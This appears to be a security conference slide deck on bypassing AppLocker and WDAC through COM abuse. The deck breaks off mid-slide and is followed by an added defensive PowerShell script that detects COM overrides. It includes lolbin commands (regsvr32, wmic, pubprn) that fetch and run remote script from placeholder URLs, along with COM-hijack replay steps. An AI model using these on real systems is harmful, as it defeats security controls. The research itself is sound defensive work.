
> COM Under the Radar: Circumventing Application Control Solutions
Figure: Game Icons [1]

> Whoami
◦ Jimmy Bayne | @bohops
◦ Security Assessor & Researcher @ByLightLLC
◦ From Baltimore, MD area
◦ Towson University Alum
◦ First BSides Talk
◦ Community Projects
  ◦ Blog | bohops.com
  ◦ LOLBAS | lolbas-project.github.io
Figure: Global Dispatch [2]

> Agenda
◦ COM Overview
◦ Application Control Overview
◦ Application Control Bypasses
◦ Defensive Considerations
…ready…set…go!

> COM Overview
What is COM?
◦ COM = Component Object Model
◦ A binary interface for software interoperability
◦ Facilitates function calls between components (middleware) [1]
◦ Technologies – DCOM, OLE, Automation, ActiveX Controls, etc.
Terminology
◦ Interface: A definition for exposing COM functionality, including methods and properties
◦ Class: An ‘implementation’ of a group of COM interfaces that serves as a template for a COM object [2]
◦ Object (Component): An instance of a COM class
◦ Instantiation: The creation or activation of an object (instance)
[1] https://www.cs.umd.edu/~pugh/com/
[2] https://docs.microsoft.com/en-us/windows/desktop/com/com-class-objects-and-clsids

> COM Overview: Registered COM
◦ Registry keys direct the activation of COM objects
◦ COM class data is located in the HKCR registry hive
◦ The data is merged from the \Software\Classes keys of the HKLM and HKCU hives
◦ Key values in HKCU take precedence over values in HKLM
◦ Notable key structure in HKCR\CLSID\
  ◦ CLSID – Class Identifier ({GUID} format)
  ◦ InprocServer32 – In-process COM server implementation (DLL, OCX)
  ◦ LocalServer32 – Out-of-process COM server implementation (EXE)
  ◦ ProgID/VersionIndependentProgID – COM class object friendly name
*Note: There are other interesting keys as well

> COM Overview: Registered COM
[Figure: annotated registry view – COM Class ID {CLSID}; COM Server (In Process Server Binary Path); COM Object Programmatic Friendly Name Identifiers]

> COM Overview: COM Example
[Figure: COM object instantiation – “Version Independent” ProgID Friendly Name; Interface ID (IID) [IWshShell3 Interface]; IWshShell3 Interface Methods & Properties; Exec Method Call]

> COM Overview: COM Abuse Vectors
◦ Active Scripting
  ◦ Script Engines (Languages) – JScript, VBScript
  ◦ Script Hosts – (Signed) binaries that execute script code
  ◦ ‘Facilitators’ – (Signed) binaries that ‘enable’ script host-code execution (e.g. lolbins)
◦ PowerShell
• COM Functionality
• Registration
• Resolution
• Features/Capabilities

> COM Resources
James Forshaw (@tiraniddo)
Matt Nelson (@enigma0x3)
Rob Maslen (@rbmaslen)
Casey Smith (@subTee)
https://www.youtube.com/watch?v=dfMuzAZRGm4
https://www.youtube.com/watch?v=3gz1QmiMhss
https://www.youtube.com/watch?v=xmbjRP5W-yk
Source: Natty Boh Gear [5]

> Application Control Overview
Application Control is the practice of restricting unauthorized code execution
Approaches
◦ Whitelists
◦ Blocklists
◦ Hybrid
Application Control ≈ Application Whitelisting (AWL)
Two major Microsoft solutions
◦ AppLocker
◦ WDAC (Device Guard)
Figure: Wikipedia [4]

> AppLocker
◦ Available since Windows Server 2008 & Windows 7 Enterprise
◦ Configured through Group Policy
◦ Supported Modes: Enforcement & Audit
◦ Rule Collections: Executable, Installer, Scripts, Packages, DLLs
◦ Rule Conditions: File Hash, Path, & Publisher
◦ Default Rules - Enforced Configuration
  ◦ Built-in option for setting a baseline rule set
◦ Places PowerShell in Constrained Language Mode (CLM)
◦ [-] Not code integrity aware
◦ [-] Not considered a security boundary
◦ [+] Less overhead to implement

> WDAC
◦ Available since Windows Server 2016 & Windows 10 Enterprise
◦ Configured through PowerShell cmdlets
◦ Supported Modes: Enforcement & Audit
◦ Rule Conditions: File Hash, File Name, Publisher, Signing Cert, etc.
◦ Default Rules - Enforced Configuration
  ◦ XML Policy - %systemroot%\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml
◦ Places PowerShell in Constrained Language Mode (CLM)
◦ [+] Code integrity aware (UMCI)
◦ [+] Considered a security boundary
◦ [-] More administrative overhead (maybe…)

> PowerShell
◦ PowerShell - “a task-based command-line shell and scripting language built on .NET” (Microsoft Docs)
◦ COM object support (e.g. new-object cmdlet)
◦ Great for Dev/IT Management
◦ (Not so) Great for hackers and Red Teams
◦ PowerShell Version 5(.1) Enhancements
  ◦ Detection optics (when enabled)
    ◦ Script block logging, module logging, and transcription
  ◦ Constrained Language Mode (CLM) support
    ◦ Restricts sensitive language elements
    ◦ Not a security boundary
    ◦ “Implementation” determines effectiveness
Source: Wiki Media [6]

> COM: Circumventing AppLocker
◦ Default Rules
  ◦ Gaps in Path rules allow for the execution of any script or executable
  ◦ Unprivileged users can “write to” interesting paths
Source: https://gist.github.com/api0cradle/563226464376d40e191ce53abcf9c4d0

> COM: Circumventing AppLocker
◦ 50 Shades of Squiblydoo
  ◦ Most variants abuse COM/DLL Registration
  ◦ Leverages scriptlet component files (.sct) and the script(let) run-time component (scrobj.dll)
  ◦ Component files can create objects and run unsigned script code
[Figure: Scriptlet Component File (“sct”)]
Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/RegSvr32.sct

> COM: Circumventing AppLocker
50 Shades of Squiblydoo (Examples)
◦ regsvr32.exe /s /n /u /i:http://url/file.sct scrobj.dll
◦ cscript.exe pubprn.vbs 127.0.0.1 script:http://someurl/file.sct
◦ cmstp.exe /s file.inf
◦ rundll32.exe advpack.dll,LaunchINFSection file.inf,DefaultInstall,1,
◦ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 c:\path to file.inf
Credits
Casey Smith (@subTee)
Matt Nelson (@enigma0x3)
Nick Tyrer (@NickTyrer)
Kyle Hanslovan (@KyleHanslovan)

> COM: Circumventing AppLocker
XML Stylesheet Transformation (XSLT)
◦ Intended for transforming XML docs into other outputs
◦ Under the hood, the variant technique abuses MSXML COM objects (interface methods and properties)
◦ XML transform functions can execute embedded script code

> COM: Circumventing AppLocker
XML Stylesheet Transformation (XSLT)
wmic process get /format:"https://example.com/evil.xsl"
http://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
(Credit: Casey Smith - @subTee)

> COM: Circumventing AppLocker
PowerShell CLM
◦ CLM restricts unapproved script execution, cmdlets, arbitrary types, type definitions, etc.
◦ However, the new-object cmdlet can instantiate COM objects under AppLocker “enforcement”
◦ Example: PowerShell XML Stylesheet Transform

> AppLocker Resources
Adam Chester (@_xpn_)
Oddvar Moe (@Oddvarmoe)
https://blog.xpnsec.com/constrained-language-mode-bypass/
https://www.youtube.com/watch?v=zw21CbNeAjA

> COM: Circumventing WDAC
Windows Lockdown Policy (WLDP)
• is activated when WDAC enforces a code integrity policy (UMCI = Enabled)
• is included with “enlightened” script hosts and engines (as wldp.dll)
• exports a function called WldpIsClassInApprovedList(), which is called to validate whether a CLSID is safe
• facilitates the instantiation of a COM (class) object if deemed safe
Potential COM WDAC Bypass Conditions
• Discovering script hosts that are not WLDP enlightened
• Manipulating trusted hosts/scripts/cmdlets to execute arbitrary/unsigned code
• Discovering script host/engine WLDP code implementation flaws for evading WldpIsClassInApprovedList() (e.g. false reliance/oversight)
• Discovering ‘unsafe’ COM objects that are in the approved list
• Re-introducing old code that is still trusted

> COM: Circumventing WDAC
CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass
◦ Under the WLDP enforced by UMCI, COM object instantiation is locked down to only a few COM objects. When this was initially tested, only the following objects were accessible:
◦ The Microsoft.XMLDOM.1.0 (Microsoft.XMLDOM) object was the most interesting.
Source: https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/

> COM: Circumventing WDAC
CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass
◦ A review of the exposed methods revealed various transform* functions

> COM: Circumventing WDAC
CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass
◦ With transformNode and a simple XSLT, we were able to bypass WDAC and execute unsigned script code

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ After CVE-2018-8492 was patched, the Microsoft.XMLDOM COM object could no longer be used to execute scriptlet code under the WDAC policy
◦ Microsoft patched and released a new MSXML3.dll (the COM server)

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ While re-building a new WDAC test machine, a test case came to mind: WDAC Bypass Replay
◦ For testing, a few versions of previous MSXML3.dll (and dependency) files were copied to the new WDAC test machine.
◦ Interestingly, a previous unpatched DLL of the same Microsoft build series was still digitally signed

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ A deeper look into the signature properties confirmed that it was catalog signed and revealed the path of the catalog file

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ For testing, the COM class registry keys from HKLM were exported to a .reg file for COM key hijacking
◦ Modifications were made for HKCU and the InprocServer32 path to point to the ‘legacy’ binary

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ After importing the .reg file back into the registry, the COM class keys were “hijacked” and merged with HKCR

> COM: Circumventing WDAC
AWL Bypass: Catalog Signature Hygiene
◦ Sure enough, a replay
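The HKCU-over-HKLM merge described under Registered COM is the same mechanism the COM key hijacking step in the Catalog Hygiene slides relies on. As an added defensive check (not code from the talk or its author), the following PowerShell lists per-user CLSID server registrations, compares each with the machine-wide entry, and reports the signature type and file version of the binary it points at; the function and column names are this example's own, and it assumes Windows PowerShell 5.1 with read access to both hives.

```powershell
# Added example: find per-user (HKCU) COM class registrations that shadow or add to
# the machine-wide (HKLM) ones. Because HKCU wins the merge into HKCR, such an entry
# redirects activation of that CLSID to whatever binary it names.
function Find-UserComOverride {
    $userRoot    = 'HKCU:\Software\Classes\CLSID'
    $machineRoot = 'HKLM:\Software\Classes\CLSID'
    if (-not (Test-Path -LiteralPath $userRoot)) { return }

    foreach ($clsidKey in Get-ChildItem -Path $userRoot -ErrorAction SilentlyContinue) {
        $clsid = $clsidKey.PSChildName
        foreach ($serverType in 'InprocServer32', 'LocalServer32') {
            $userServer = "$userRoot\$clsid\$serverType"
            if (-not (Test-Path -LiteralPath $userServer)) { continue }

            # The (default) value of the server key holds the DLL/EXE path
            $userPath      = (Get-ItemProperty -LiteralPath $userServer -ErrorAction SilentlyContinue).'(default)'
            $machineServer = "$machineRoot\$clsid\$serverType"
            $machinePath   = $null
            if (Test-Path -LiteralPath $machineServer) {
                $machinePath = (Get-ItemProperty -LiteralPath $machineServer -ErrorAction SilentlyContinue).'(default)'
            }

            # Expand %SystemRoot% etc. and strip a quoted path's trailing arguments before inspecting the file
            $version = $null; $sigStatus = 'NotFound'; $sigType = $null
            if ($userPath) {
                $binary = [Environment]::ExpandEnvironmentVariables($userPath) -replace '^"([^"]+)".*$', '$1'
                if (Test-Path -LiteralPath $binary -PathType Leaf) {
                    $sig       = Get-AuthenticodeSignature -FilePath $binary
                    $sigStatus = $sig.Status          # Valid / NotSigned / HashMismatch ...
                    $sigType   = $sig.SignatureType   # Embedded / Catalog / None
                    $version   = (Get-Item -LiteralPath $binary).VersionInfo.FileVersion
                }
            }

            [pscustomobject]@{
                CLSID       = $clsid
                ServerType  = $serverType
                UserPath    = $userPath
                MachinePath = $machinePath
                # Shadowed: HKLM registers its own server for this CLSID and HKCU points elsewhere
                Shadowed    = [bool]$machinePath -and ($userPath -ne $machinePath)
                FileVersion = $version
                SigStatus   = $sigStatus
                SigType     = $sigType
            }
        }
    }
}

# Surface only entries that override a machine-wide server or have no HKLM counterpart
Find-UserComOverride | Where-Object { $_.Shadowed -or -not $_.MachinePath } | Format-Table -AutoSize
```

A catalog-signed server with an older FileVersion than the copy under %SystemRoot% is the condition the Catalog Hygiene slides describe, so that column is worth comparing against the installed build.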